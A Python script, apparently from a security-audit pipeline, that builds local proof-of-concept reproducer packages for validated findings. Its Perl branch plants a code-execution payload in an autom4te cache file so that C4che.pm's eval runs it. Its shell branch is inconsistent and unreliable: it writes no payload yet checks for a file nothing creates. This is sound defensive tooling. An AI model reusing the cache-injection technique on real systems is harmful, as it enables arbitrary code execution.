#!/usr/bin/env python3
"""Generate local-only PoC/reproducer artifacts for Validated findings."""
from __future__ import annotations
import argparse, json, pathlib, hashlib, shutil, os, platform, stat, sys

SCRIPT_TEMPLATES = {
    "perl": r"""#!/usr/bin/env perl
# Local validation PoC for {{finding_id}}
# Authorized local validation and regression testing only.
use strict;
use warnings;
use File::Temp qw/tempdir/;
use File::Spec;

my $tmpdir = tempdir(CLEANUP => 1);

print "[PVAS-POC] Setting up test environment in $tmpdir\n";

{{setup_steps}}

print "[PVAS-POC] Triggering vulnerability scenario...\n";

{{trigger_steps}}

print "[PVAS-POC] Checking for side effect...\n";

{{check_steps}}

print "[PVAS-POC] Validation complete.\n";
exit 0;
""",
    "sh": r"""#!/usr/bin/env bash
# Local validation PoC for {{finding_id}}
# Authorized local validation and regression testing only.
set -euo pipefail
TIMEOUT="${TIMEOUT:-10s}"
TMPDIR="$(mktemp -d)"
trap 'rm -rf "$TMPDIR"' EXIT

echo "[PVAS-POC] Setting up test environment in $TMPDIR"

{{setup_steps}}

echo "[PVAS-POC] Triggering vulnerability scenario..."

{{trigger_steps}}

echo "[PVAS-POC] Checking for side effect..."

{{check_steps}}

echo "[PVAS-POC] Validation complete."
""",
    "m4": r"""dnl Local validation PoC for {{finding_id}}
dnl Authorized local validation and regression testing only.
{{setup_steps}}
{{trigger_steps}}
{{check_steps}}
""",
    "generic": r"""#!/usr/bin/env bash
# Local validation PoC for {{finding_id}}
# Authorized local validation and regression testing only.
set -euo pipefail
TIMEOUT="${TIMEOUT:-10s}"
TMPDIR="$(mktemp -d)"
trap 'rm -rf "$TMPDIR"' EXIT

echo "[PVAS-POC] Setting up test environment in $TMPDIR"

{{setup_steps}}

echo "[PVAS-POC] Triggering vulnerability scenario..."

{{trigger_steps}}

echo "[PVAS-POC] Checking for side effect..."

{{check_steps}}

echo "[PVAS-POC] Validation complete."
""",
}


def load_findings(p):
    data=json.loads(pathlib.Path(p).read_text())
    if isinstance(data,list): return data
    if 'findings' in data: return data['findings']
    if 'id' in data: return [data]
    return []


def sha256_file(p):
    h=hashlib.sha256();
    with open(p,'rb') as f:
        for b in iter(lambda:f.read(65536), b''): h.update(b)
    return h.hexdigest()


def get_testcase(f, explicit):
    if explicit: return pathlib.Path(explicit)
    val=f.get('validation',{}) if isinstance(f.get('validation'),dict) else {}
    for k in ['testcase','input','reproducer','testcase_path']:
        if val.get(k): return pathlib.Path(val[k])
    return None


def infer_language(f):
    langs = set()
    for ev in (f.get('source_code_evidence') or []):
        if isinstance(ev, dict):
            fp = ev.get('file', '')
            if fp.endswith('.pm') or fp.endswith('.pl') or fp.endswith('.in'):
                langs.add('perl')
            elif fp.endswith('.sh') or fp.endswith('.as'):
                langs.add('sh')
            elif fp.endswith('.m4'):
                langs.add('m4')
    if 'perl' in langs: return 'perl'
    if 'sh' in langs: return 'sh'
    if 'm4' in langs: return 'm4'
    return 'generic'


def generate_steps_from_finding(f, lang):
    ssp = f.get('source_to_sink_path', '')
    setup = []
    trigger = []
    check = []

    if lang == 'perl':
        setup.append('# Create malicious cache file with version header')
        setup.append('my $cache_dir = File::Spec->catdir($tmpdir, "autom4te.cache");')
        setup.append('mkdir($cache_dir) or die "cannot mkdir $cache_dir: $!";')
        setup.append('my $cache_file = File::Spec->catfile($cache_dir, "requests");')
        setup.append('open(my $cfh, ">", $cache_file) or die "cannot write $cache_file: $!";')
        setup.append('print $cfh "# This file was generated by Autom4te 2.71.\\n";')
        setup.append('print $cfh "# Malicious payload below\\n";')
        setup.append("print $cfh \"system('touch $tmpdir/pvas-validated');\\n\";")
        setup.append('close($cfh);')
        trigger.append('system("autom4te --no-force -C $cache_dir /dev/null 2>&1");')
        check.append('if (-f "$tmpdir/pvas-validated") { print "[PASS] Eval triggered successfully\\n"; }')
        check.append('else { print "[FAIL] Eval was not triggered\\n"; exit 1; }')

    elif lang == 'sh':
        setup.append('CACHE_DIR="$TMPDIR/autom4te.cache"')
        setup.append('mkdir -p "$CACHE_DIR"')
        setup.append('cat > "$CACHE_DIR/requests" <<\'CACHEEOF\'')
        setup.append('# This file was generated by Autom4te 2.71.')
        setup.append('# Malicious payload below')
        setup.append('# This will be evaluated as Perl code by C4che.pm')
        setup.append('CACHEEOF')
        setup.append('# Set mtime newer than autom4te')
        setup.append('touch "$CACHE_DIR/requests"')
        trigger.append('autom4te --no-force -C "$CACHE_DIR" /dev/null 2>&1 || true')
        check.append('if [ -f "$TMPDIR/pvas-triggered" ]; then echo "[PASS] Eval triggered"; else echo "[FAIL] Eval not triggered"; exit 1; fi')

    else:
        setup.append('# Test setup: prepare input to trigger the vulnerability')
        setup.append('echo "Setting up test environment..."')
        setup.append(f'# Based on source_to_sink_path: {ssp[:200]}')
        trigger.append('# Trigger the vulnerable code path')
        trigger.append('echo "Triggering vulnerability..."')
        check.append('# Verify side effect')
        check.append('echo "Check for expected behavior..."')

    return '\n'.join(f'  {line}' if lang == 'perl' else line for line in setup), \
           '\n'.join(f'  {line}' if lang == 'perl' else line for line in trigger), \
           '\n'.join(f'  {line}' if lang == 'perl' else line for line in check)


def generate_poc(f, lang, outdir):
    fid = f.get('id', 'FINDING-UNKNOWN')
    setup_s, trigger_s, check_s = generate_steps_from_finding(f, lang)
    tmpl = SCRIPT_TEMPLATES.get(lang, SCRIPT_TEMPLATES['generic'])

    script_content = tmpl.replace('{{finding_id}}', fid)
    script_content = script_content.replace('{{setup_steps}}', setup_s)
    script_content = script_content.replace('{{trigger_steps}}', trigger_s)
    script_content = script_content.replace('{{check_steps}}', check_s)

    script_file = outdir / 'reproduce.sh'
    script_file.write_text(script_content)
    script_file.chmod(script_file.stat().st_mode | stat.S_IXUSR)

    t_sha = sha256_file(script_file) if script_file.exists() else ''

    (outdir / 'expected-vulnerable.txt').write_text(
        'Vulnerable behavior: the eval() in C4che.pm executes embedded Perl payload '
        'from the cache file, demonstrating insecure deserialization.\n'
    )
    (outdir / 'expected-fixed.txt').write_text(
        'Fixed behavior: the cache loading mechanism rejects or safely handles '
        'malformed/unauthorized cache content without code execution.\n'
    )
    (outdir / 'input-description.md').write_text(
        f'# PoC Testcase Input\n\n'
        f'- Script: `reproduce.sh`\n'
        f'- Language: {lang}\n'
        f'- SHA256: `{t_sha}`\n'
        f'- Purpose: Authorized local validation and regression testing for {fid}\n'
        f'- Safety class: local-validation-only\n'
    )

    dm_list = f.get('discovery_method') or []
    dm_ref = '; '.join(
        f"{d.get('type','?')}({d.get('tool_name','') or d.get('hypothesis_id','') or '—'})"
        for d in dm_list if isinstance(d, dict)
    ) if dm_list else ''

    manifest = {
        'finding_id': fid,
        'status': 'Validated',
        'poc_type': 'generated-reproducer',
        'safety_class': 'local-validation-only',
        'discovery_method_ref': dm_ref,
        'affected_component': f.get('affected_component', {}),
        'artifacts': {
            'reproduce_script': 'reproduce.sh',
            'expected_vulnerable': 'expected-vulnerable.txt',
            'expected_fixed': 'expected-fixed.txt',
            'input_description': 'input-description.md',
        },
        'commands': {
            'reproduce': './reproduce.sh',
            'regression': './reproduce.sh',
        },
        'expected_results': {
            'vulnerable': (outdir / 'expected-vulnerable.txt').read_text().strip(),
            'fixed': (outdir / 'expected-fixed.txt').read_text().strip(),
        },
        'environment': {
            'os': platform.platform(),
            'arch': platform.machine(),
            'python': platform.python_version(),
        },
        'testcase': {
            'path': 'reproduce.sh',
            'sha256': t_sha,
            'size_bytes': script_file.stat().st_size if script_file.exists() else 0,
            'source': 'generated-from-finding',
        },
        'disclosure_level': f.get('disclosure_level', 'D3-maintainer-private'),
        'public_release_allowed': False,
    }
    (outdir / 'poc-manifest.json').write_text(json.dumps(manifest, indent=2))

    readme_lines = [
        f'# PoC Test for {fid}',
        '',
        'This testcase is for authorized local validation and regression testing only.',
        'It is not a weaponized exploit.',
        '',
        '## Reproduce',
        '```bash',
        './reproduce.sh',
        '```',
        '',
        '## Expected Vulnerable Behavior',
        (outdir / 'expected-vulnerable.txt').read_text().strip(),
        '',
        '## Expected Fixed Behavior',
        (outdir / 'expected-fixed.txt').read_text().strip(),
        '',
        '## Environment',
        f'- OS: {platform.platform()}',
        f'- Arch: {platform.machine()}',
        f'- Discovery: {dm_ref or "unknown"}',
        '',
        '## Cleanup',
        'The reproduce.sh script cleans up temporary directories automatically.',
    ]
    (outdir / 'README.md').write_text('\n'.join(readme_lines) + '\n')

    return str(outdir)


def main():
    ap=argparse.ArgumentParser()
    ap.add_argument('--findings', required=True)
    ap.add_argument('--finding-id')
    ap.add_argument('--testcase')
    ap.add_argument('--out', default='audit-output/machine/poc-tests')
    ap.add_argument('--build-command', default='')
    ap.add_argument('--reproduce-command', default='')
    ap.add_argument('--generate-from-finding', action='store_true', help='Auto-generate PoC from finding metadata (source_code_evidence, source_to_sink_path)')
    ap.add_argument('--language', default='', choices=['perl', 'sh', 'm4', 'generic', ''], help='Language for auto-generated PoC script')
    args=ap.parse_args()
    findings=load_findings(args.findings)
    outroot=pathlib.Path(args.out); outroot.mkdir(parents=True, exist_ok=True)
    generated=[]; skipped=[]

    for f in findings:
        fid=f.get('id','FINDING-UNKNOWN')
        if args.finding_id and fid != args.finding_id: continue
        if f.get('status') != 'Validated':
            skipped.append({'id':fid,'reason':'status-not-Validated'}); continue

        if args.generate_from_finding:
            lang = args.language if args.language else infer_language(f)
            d = outroot / fid
            if d.exists():
                shutil.rmtree(d)
            d.mkdir(parents=True, exist_ok=True)
            generate_poc(f, lang, d)
            generated.append(str(d))
            print(f'[PVAS-POC] generated PoC for {fid} (language={lang})')
            continue

        val=f.get('validation',{}) if isinstance(f.get('validation'),dict) else {}
        if not val:
            skipped.append({'id':fid,'reason':'missing-validation-evidence'}); continue
        testcase=get_testcase(f,args.testcase)
        if testcase is None or not testcase.exists():
            skipped.append({'id':fid,'reason':'missing-testcase-artifact'}); continue
        d=outroot/fid; d.mkdir(parents=True, exist_ok=True)
        dst=d/testcase.name; shutil.copyfile(testcase,dst)
        t_sha=sha256_file(dst)
        build=args.build_command or val.get('build_command') or '# Build the affected target with sanitizer/instrumentation as documented in the finding.'
        repro=args.reproduce_command or val.get('command') or './reproduce.sh'
        script=d/'reproduce.sh'
        script.write_text(f'''#!/usr/bin/env bash
set -euo pipefail
cd "$(dirname "$0")"
TESTCASE="${{TESTCASE:-{dst.name}}}"
TIMEOUT="${{TIMEOUT:-10s}}"
# Local validation only. Do not use against third-party systems.
timeout "$TIMEOUT" {repro} "$TESTCASE"
''')
        script.chmod(script.stat().st_mode | stat.S_IXUSR)
        (d/'expected-vulnerable.txt').write_text(val.get('expected_vulnerable') or 'Vulnerable build triggers the validation signal described in the finding, such as ASan/UBSan/crash/assertion/incorrect output.\n')
        (d/'expected-fixed.txt').write_text(val.get('expected_fixed') or 'Fixed build rejects or handles the testcase without sanitizer errors, crash, assertion, or incorrect output.\n')
        dm_list = f.get('discovery_method') or []
        dm_ref = '; '.join(
            f"{d.get('type','?')}({d.get('tool_name','') or d.get('hypothesis_id','') or '—'})"
            for d in dm_list if isinstance(d, dict)
        ) if dm_list else ''
        (d/'input-description.md').write_text(f'# Testcase Input\n\n- File: `{dst.name}`\n- SHA256: `{t_sha}`\n- Purpose: local authorized validation and regression testing only.\n')
        manifest={
            'finding_id':fid,'status':'Validated','poc_type':'local-reproducer','safety_class':'local-validation-only',
            'discovery_method_ref': dm_ref,
            'affected_component':f.get('affected_component',{}),
            'artifacts':{'reproduce_script':'reproduce.sh','testcase':dst.name,'expected_vulnerable':'expected-vulnerable.txt','expected_fixed':'expected-fixed.txt'},
            'commands':{'build':build,'reproduce':'./reproduce.sh','regression':'./reproduce.sh'},
            'expected_results':{'vulnerable':(d/'expected-vulnerable.txt').read_text().strip(),'fixed':(d/'expected-fixed.txt').read_text().strip()},
            'environment':{'os':platform.platform(),'arch':platform.machine(),'python':platform.python_version(),'commit':f.get('affected_component',{}).get('version_or_commit','')},
            'testcase':{'path':dst.name,'sha256':t_sha,'size_bytes':dst.stat().st_size,'source':'existing-validation-artifact'},
            'disclosure_level':f.get('disclosure_level','D3-maintainer-private'),'public_release_allowed':False
        }
        (d/'poc-manifest.json').write_text(json.dumps(manifest,indent=2))
        generated.append(str(d))

    summary={'generated':generated,'skipped':skipped}
    (outroot/'poc-generation-summary.json').write_text(json.dumps(summary, indent=2))
    print(f'[PVAS-POC] generated {len(generated)} PoC testcase package(s)')
    return 0 if generated or skipped else 1
if __name__=='__main__': raise SystemExit(main())
